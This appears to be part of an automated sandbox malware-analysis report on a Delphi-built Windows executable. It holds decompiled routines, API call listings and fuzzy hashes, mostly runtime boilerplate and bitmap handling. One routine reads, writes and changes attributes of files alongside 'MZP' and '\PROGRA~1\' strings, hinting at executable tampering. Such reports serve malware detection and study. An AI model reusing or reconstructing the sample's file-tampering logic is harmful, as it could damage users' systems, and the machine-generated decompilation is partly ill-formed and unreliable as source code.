                                                                          							__eflags = _t142;
                                                                          							if(_t142 < 0) {
                                                                          								_t142 =  ~_t142;
                                                                          							}
                                                                          							_push(0);
                                                                          							L00404108();
                                                                          							_push(_t69);
                                                                          							__eflags =  *((char*)(_t115 + 0x3c)) - 1;
                                                                          							if( *((char*)(_t115 + 0x3c)) != 1) {
                                                                          								asm("jecxz 0xfffffff2");
                                                                          								_t147 = 0;
                                                                          								_t129 =  *(_t115 + 0x18);
                                                                          								_push(E00405F70( *((intOrPtr*)(_t115 + 0x1c)),  *((intOrPtr*)(( *(_t115 + 0x49) & 0x000000ff) + 0x409188)),  *(_t115 + 0x18)));
                                                                          								__eflags =  *(_t115 + 0x49) - 5;
                                                                          								if( *(_t115 + 0x49) == 5) {
                                                                          									E0040600C(_t74, _t129);
                                                                          								}
                                                                          								_pop(_t75);
                                                                          								_push(_t75);
                                                                          								_push(E00406268(_t75) *  *(_t115 + 0x18));
                                                                          								_t78 = E00402448(E00406268(_t75) *  *(_t115 + 0x18));
                                                                          								_push(_t78);
                                                                          								_push(0);
                                                                          								_push(_v12);
                                                                          								_push(_t78);
                                                                          								_t79 =  *(_t115 + 0x18);
                                                                          								__eflags = _t79 - _t142;
                                                                          								if(__eflags > 0) {
                                                                          									_t79 = _t142;
                                                                          								}
                                                                          								_t82 = GetDIBits(_v8, E00406154(_t115, __eflags), 0, _t79, ??, ??, ??);
                                                                          								_t132 =  *(_t115 + 0x18);
                                                                          								__eflags = _t132 - _t142;
                                                                          								if(_t132 > _t142) {
                                                                          									_t132 = _t142;
                                                                          								}
                                                                          								__eflags = _t82 - _t132;
                                                                          								if(__eflags != 0) {
                                                                          									_pop(_t88);
                                                                          									E00402468(_t88);
                                                                          									_push(0);
                                                                          									_push(0);
                                                                          									_push(0);
                                                                          									_push(_t149);
                                                                          									_push(0);
                                                                          									_push(_v40);
                                                                          									_push(_v36);
                                                                          									L00404110();
                                                                          									_t144 = _t144 ^ 0xffffffff;
                                                                          									_t147 = 0;
                                                                          									_t92 = SelectObject(_v60, 0);
                                                                          									_t132 = _v68;
                                                                          									__eflags = 0;
                                                                          									E00406094(_t115, 0, _v68, 0, 0);
                                                                          									SelectObject(_v72, _t92);
                                                                          								}
                                                                          								E00406024(_t115, _t115, _t132, __eflags);
                                                                          								_pop( *_t51);
                                                                          								_pop( *_t52);
                                                                          								_pop( *_t53);
                                                                          								 *(_t115 + 0x20) = _t147;
                                                                          								__eflags = _t144;
                                                                          								 *(_t115 + 0x72) = 0;
                                                                          								if(_t144 < 0) {
                                                                          									_t56 = _t115 + 0x72;
                                                                          									 *_t56 =  &( *(_t115 + 0x72)->i);
                                                                          									__eflags =  *_t56;
                                                                          								}
                                                                          								goto L25;
                                                                          							} else {
                                                                          								_push(0);
                                                                          								L00404178();
                                                                          								_push(_t69);
                                                                          								_push( *(_t115 + 0x18));
                                                                          								_push( *((intOrPtr*)(_t115 + 0x1c)));
                                                                          								_push(_t69);
                                                                          								L00404100();
                                                                          								_t148 = _t69;
                                                                          								L00404190();
                                                                          								_t135 = 0;
                                                                          								_push(_t135);
                                                                          								_push(SelectObject(_t135, _t148));
                                                                          								_push( *(_t115 + 0x18));
                                                                          								_push( *((intOrPtr*)(_t115 + 0x1c)));
                                                                          								_push(0);
                                                                          								_t101 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t115 + 0x2c))));
                                                                          								_t136 = _t149;
                                                                          								FillRect(_v44, _t149, _t101);
                                                                          								DeleteObject(_t101);
                                                                          								asm("jecxz 0x24");
                                                                          								SelectObject(_v60, 0);
                                                                          								SetDIBits(_v68, _t148, 0,  *(_t115 + 0x18),  *(_t115 + 0x41),  *(_t115 + 0x3d), 0);
                                                                          								E00406024(_t115, _t115, _t136, __eflags);
                                                                          								 *(_t115 + 0x20) = _t148;
                                                                          								L25:
                                                                          								asm("jecxz 0xa");
                                                                          								_pop(_t133);
                                                                          								 *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x4a))))(_t133);
                                                                          								_t87 = DeleteDC(_t142);
                                                                          								asm("popad");
                                                                          								return _t87;
                                                                          							}
                                                                          						}
                                                                          						return _t66;
                                                                          					} else {
                                                                          						return _t64;
                                                                          					}
                                                                          				} else {
                                                                          					_push(__edx);
                                                                          					_t64 = E0040648C(_t113, __edx);
                                                                          					_pop(_t137);
                                                                          					if(_t64 == _t137) {
                                                                          						goto L7;
                                                                          					} else {
                                                                          						_t108 = _t113;
                                                                          						if(_t137 != 0) {
                                                                          							 *(_t113 + 0x49) = _t137;
                                                                          							__eflags = _t137 - 5;
                                                                          							if(_t137 == 5) {
                                                                          								_t137 = _t137 - 1;
                                                                          								__eflags = _t137;
                                                                          							}
                                                                          							L27();
                                                                          							_t111 = E00405F98( *( *((intOrPtr*)(_t113 + 0x3d)) + 0xe) & 0x0000ffff, 0);
                                                                          							_t139 = _t137;
                                                                          							__eflags = _t111 - _t139;
                                                                          							_t64 = _t113;
                                                                          							goto L7;
                                                                          						} else {
                                                                          							_t140 =  &(_t137->i);
                                                                          							if(_t140 !=  *(_t108 + 0x3c)) {
                                                                          								 *(_t108 + 0x3c) = _t140;
                                                                          								L9();
                                                                          								return _t108;
                                                                          							}
                                                                          							return _t108;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                          • Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
                                                                          • Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                          • Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                          • Instruction ID: 4cf276d7622785da586c8009362eb5643f0905aac9be693976ada0e9182b1a0c
                                                                          • Opcode Fuzzy Hash: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                          • Instruction Fuzzy Hash: 7E3102706041006FDB24AF65CC82F2A3A6AAF84308F5144BFB901BF6DBC63DDC499758
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410198
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004101B7
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00410221
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410356
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041040F
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00410496
                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004101EA
                                                                            • Part of subcall function 0040FC78: GetObjectA.GDI32(00000000,00000018), ref: 0040FC8A
                                                                            • Part of subcall function 0040FBEC: 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC0F
                                                                            • Part of subcall function 0040FBEC: 72E7A7A0.GDI32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC2A
                                                                            • Part of subcall function 0040FBEC: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 0040FC35
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041052B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$CopyImage$B380
                                                                          • String ID: (
                                                                          • API String ID: 1117845954-3887548279
                                                                          • Opcode ID: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                          • Instruction ID: a4bd64b3fd63d48472c9145484328d1e8b73c1e654bc960fa13628ff834bc38b
                                                                          • Opcode Fuzzy Hash: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                          • Instruction Fuzzy Hash: 05E15134E002189BDB20EBA9C885BDEB7B5AF48314F50807BF505F7382DA799D85CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,Function_0000748C), ref: 00410DB0
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410DC2
                                                                            • Part of subcall function 0040E600: CreateFileA.KERNEL32(?,40000400,40000400,00000000,40000400,40000400,00000000,0040E6CC,00000000,Function_00004C66), ref: 0040E620
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410EF9
                                                                            • Part of subcall function 0040E65C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,0040E75F,00000000,Function_00004CE6), ref: 0040E667
                                                                            • Part of subcall function 0040E64C: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00410C11,00000000,Function_000071BF), ref: 0040E654
                                                                            • Part of subcall function 0040E678: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040E682
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                          • API String ID: 997383822-4093836345
                                                                          • Opcode ID: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                          • Instruction ID: 2f0480c31d9fc6f6f6bd4ff7e20304d554dec23e4d9677c87e7e87a18c1bd8bd
                                                                          • Opcode Fuzzy Hash: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                          • Instruction Fuzzy Hash: B1515570B003089BDB14FB6ECC8269EB3659F55308F5089BBB404B73D2DA7D9E854B59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                                          				long _t11;
                                                                          				void* _t16;
                                                                          
                                                                          				_t16 = __ebx;
                                                                          				 *__edi =  *__edi + __ecx;
                                                                          				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
                                                                          				 *0x40900c = 2;
                                                                          				 *0x40a010 = 0x401008;
                                                                          				 *0x40a014 = 0x401010;
                                                                          				 *0x40a036 = 2;
                                                                          				 *0x40a000 = E00403960;
                                                                          				if(E00402808() != 0) {
                                                                          					_t3 = E00402838();
                                                                          				}
                                                                          				E004028FC(_t3);
                                                                          				 *0x40a03c = 0xd7b0;
                                                                          				 *0x40a208 = 0xd7b0;
                                                                          				 *0x40a3d4 = 0xd7b0;
                                                                          				 *0x40a02c = GetCommandLineA();
                                                                          				 *0x40a028 = E00401098();
                                                                          				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                                          					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
                                                                          				} else {
                                                                          					if((GetVersion() & 0x000000ff) <= 4) {
                                                                          						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
                                                                          					} else {
                                                                          						 *0x40a5a8 = 3;
                                                                          					}
                                                                          				}
                                                                          				_t11 = GetCurrentThreadId();
                                                                          				 *0x40a020 = _t11;
                                                                          				return _t11;
                                                                          			}

                                                                          Instruction addresses (one per decompiled statement, in listing order): 0x00403d7d 0x00403d82 0x00403d87 0x00403d89 0x00403d90 0x00403d9a 0x00403da4 0x00403dab 0x00403dbc 0x00403dbe 0x00403dbe 0x00403dc3 0x00403dc8 0x00403dd1 0x00403dda 0x00403de8 0x00403df2 0x00403e06 0x00403e3f 0x00403e08 0x00403e16 0x00403e2e 0x00403e18 0x00403e18 0x00403e18 0x00403e16 0x00403e44 0x00403e49 0x00403e4e

                                                                          APIs
                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32(00000000), ref: 0040280D
                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32(00000001), ref: 00402819
                                                                          • GetCommandLineA.KERNEL32 ref: 00403DE3
                                                                          • GetVersion.KERNEL32 ref: 00403DF7
                                                                          • GetVersion.KERNEL32 ref: 00403E08
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00403E44
                                                                            • Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                            • Part of subcall function 00402838: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                            • Part of subcall function 00402838: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                          • GetThreadLocale.KERNEL32 ref: 00403E24
                                                                            • Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                          • String ID: p8b
                                                                          • API String ID: 3734044017-529731021
                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction ID: 4e42c8c4ff7c9e6347351f52ed3844a5f6dcad7449c2d11acc3bcf8107044070
                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction Fuzzy Hash: 7B016DB180438599E710BF72AA4A3193E64AB11309F10853FA080BA3F3D77D06989B6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E,0040BF7B), ref: 0040C9E9
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E), ref: 0040C9EF
                                                                          • GetStdHandle.KERNEL32(000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA04
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA0A
                                                                          • MessageBoxA.USER32 ref: 0040CA28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileHandleWrite$Message
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1570097196-2970929446
                                                                          • Opcode ID: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                          • Instruction ID: e346e235dea6380484e37d32cf1e26acb754014f59db45d581b47c6c48365cc5
                                                                          • Opcode Fuzzy Hash: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                          • Instruction Fuzzy Hash: 58F0CDA0BC430878E620E3A4AE0AF5A221C4348B15F60463FB220741D3C6BC4894C72F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 79%
                                                                          			E00402F18(void* __ecx) {
                                                                          				long _v4;
                                                                          				int _t3;
                                                                          
                                                                          				if( *0x40a034 == 0) {
                                                                          					if( *0x409024 == 0) {
                                                                          						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                          					}
                                                                          					return _t3;
                                                                          				} else {
                                                                          					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
                                                                          						 *0x40a220();
                                                                          					}
                                                                          					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                          					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
                                                                          				}
                                                                          			}

                                                                          Instruction addresses (one per decompiled statement, in listing order): 0x00402f20 0x00402f80 0x00402f90 0x00402f90 0x00402f96 0x00402f22 0x00402f2b 0x00402f3b 0x00402f3b 0x00402f57 0x00402f78 0x00402f78

                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F57
                                                                          • GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F6C
                                                                          • WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F72
                                                                          • MessageBoxA.USER32 ref: 00402F90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileHandleWrite$Message
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1570097196-2970929446
                                                                          • Opcode ID: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                          • Instruction ID: 6c3b7e42d3c7ef80f9ab9078d96d43441ff44d86987642024caec186a117226f
                                                                          • Opcode Fuzzy Hash: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                          • Instruction Fuzzy Hash: 5AF0B47168438538E630A3609F0EF5A226C4744B99F20467FB660781F6C7FC58C4921E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 71%
                                                                          			E0040184C() {
                                                                          				void* _t2;
                                                                          				void* _t3;
                                                                          				void* _t14;
                                                                          				intOrPtr* _t19;
                                                                          				intOrPtr _t23;
                                                                          				intOrPtr _t26;
                                                                          				intOrPtr _t28;
                                                                          
                                                                          				_t26 = _t28;
                                                                          				if( *0x40a5ac == 0) {
                                                                          					return _t2;
                                                                          				} else {
                                                                          					_push(_t26);
                                                                          					_push(E00401922);
                                                                          					_push( *[fs:edx]);
                                                                          					 *[fs:edx] = _t28;
                                                                          					if( *0x40a035 != 0) {
                                                                          						_push(0x40a5b4);
                                                                          						L004010E4();
                                                                          					}
                                                                          					 *0x40a5ac = 0;
                                                                          					_t3 =  *0x40a60c; // 0x640868
                                                                          					LocalFree(_t3);
                                                                          					 *0x40a60c = 0;
                                                                          					_t19 =  *0x40a5d4; // 0x641e7c
                                                                          					while(_t19 != 0x40a5d4) {
                                                                          						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                                                          						_t19 =  *_t19;
                                                                          					}
                                                                          					E0040114C(0x40a5d4);
                                                                          					E0040114C(0x40a5e4);
                                                                          					E0040114C(0x40a610);
                                                                          					_t14 =  *0x40a5cc; // 0x641868
                                                                          					while(_t14 != 0) {
                                                                          						 *0x40a5cc =  *_t14;
                                                                          						LocalFree(_t14);
                                                                          						_t14 =  *0x40a5cc; // 0x641868
                                                                          					}
                                                                          					_pop(_t23);
                                                                          					 *[fs:eax] = _t23;
                                                                          					_push(0x401929);
                                                                          					if( *0x40a035 != 0) {
                                                                          						_push(0x40a5b4);
                                                                          						L004010EC();
                                                                          					}
                                                                          					_push(0x40a5b4);
                                                                          					L004010F4();
                                                                          					return 0;
                                                                          				}
                                                                          			}

                                                                          Instruction addresses (one per decompiled statement, in listing order): 0x0040184d 0x00401857 0x0040192b 0x0040185d 0x0040185f 0x00401860 0x00401865 0x00401868 0x00401872 0x00401874 0x00401879 0x00401879 0x0040187e 0x00401885 0x0040188b 0x00401892 0x00401897 0x004018b1 0x004018aa 0x004018af 0x004018af 0x004018be 0x004018c8 0x004018d2 0x004018d7 0x004018de 0x004018e2 0x004018e9 0x004018ee 0x004018f3 0x004018f9 0x004018fc 0x004018ff 0x0040190b 0x0040190d 0x00401912 0x00401912 0x00401917 0x0040191c 0x00401921 0x00401921

                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
                                                                          • LocalFree.KERNEL32(00640868,00000000,00401922), ref: 0040188B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00640868,00000000,00401922), ref: 004018AA
                                                                          • LocalFree.KERNEL32(00641868,?,00000000,00008000,00640868,00000000,00401922), ref: 004018E9
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00640868,00000000,00401922), ref: 00401912
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00640868,00000000,00401922), ref: 0040191C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID:
                                                                          • API String ID: 3782394904-0
                                                                          • Opcode ID: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                          • Instruction ID: 2c75820c4bf2e6ed0dab6d922aeac6927b5e2e4dc662dc8188128fe539cf0cf0
                                                                          • Opcode Fuzzy Hash: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                          • Instruction Fuzzy Hash: FD1182B1704380AEE715EBA69D92B1277E8B745708F14847BF140B66F2C67D9860CB1E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 0040B311
                                                                          • LocalFree.KERNEL32(00640868,00000000,00401922), ref: 0040B323
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00640868,00000000,00401922), ref: 0040B342
                                                                          • LocalFree.KERNEL32(00641868,?,00000000,00008000,00640868,00000000,00401922), ref: 0040B381
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00640868,00000000,00401922), ref: 0040B3AA
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00640868,00000000,00401922), ref: 0040B3B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID:
                                                                          • API String ID: 3782394904-0
                                                                          • Opcode ID: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                          • Instruction ID: 308c92a7e2b5e7ecfd07cead530b628894948fc1d130f20f37bfe88cfaf8842a
                                                                          • Opcode Fuzzy Hash: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                          • Instruction Fuzzy Hash: 89115EB06043406ED711EB669D41B167BB9F745708F24843BE944B62E2C77DA870CB6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 65%
                                                                          			E00402838() {
                                                                          				void* _v8;
                                                                          				char _v12;
                                                                          				int _v16;
                                                                          				signed short _t12;
                                                                          				signed short _t14;
                                                                          				intOrPtr _t27;
                                                                          				void* _t29;
                                                                          				void* _t31;
                                                                          				intOrPtr _t32;
                                                                          
                                                                          				_t29 = _t31;
                                                                          				_t32 = _t31 + 0xfffffff4;
                                                                          				_v12 =  *0x409018 & 0x0000ffff;
                                                                          				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                          					_t12 =  *0x409018; // 0x1332
                                                                          					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                          					 *0x409018 = _t14;
                                                                          					return _t14;
                                                                          				} else {
                                                                          					_push(_t29);
                                                                          					_push(E004028A9);
                                                                          					_push( *[fs:eax]);
                                                                          					 *[fs:eax] = _t32;
                                                                          					_v16 = 4;
                                                                          					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                          					_pop(_t27);
                                                                          					 *[fs:eax] = _t27;
                                                                          					_push(0x4028b0);
                                                                          					return RegCloseKey(_v8);
                                                                          				}
                                                                          			}
                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
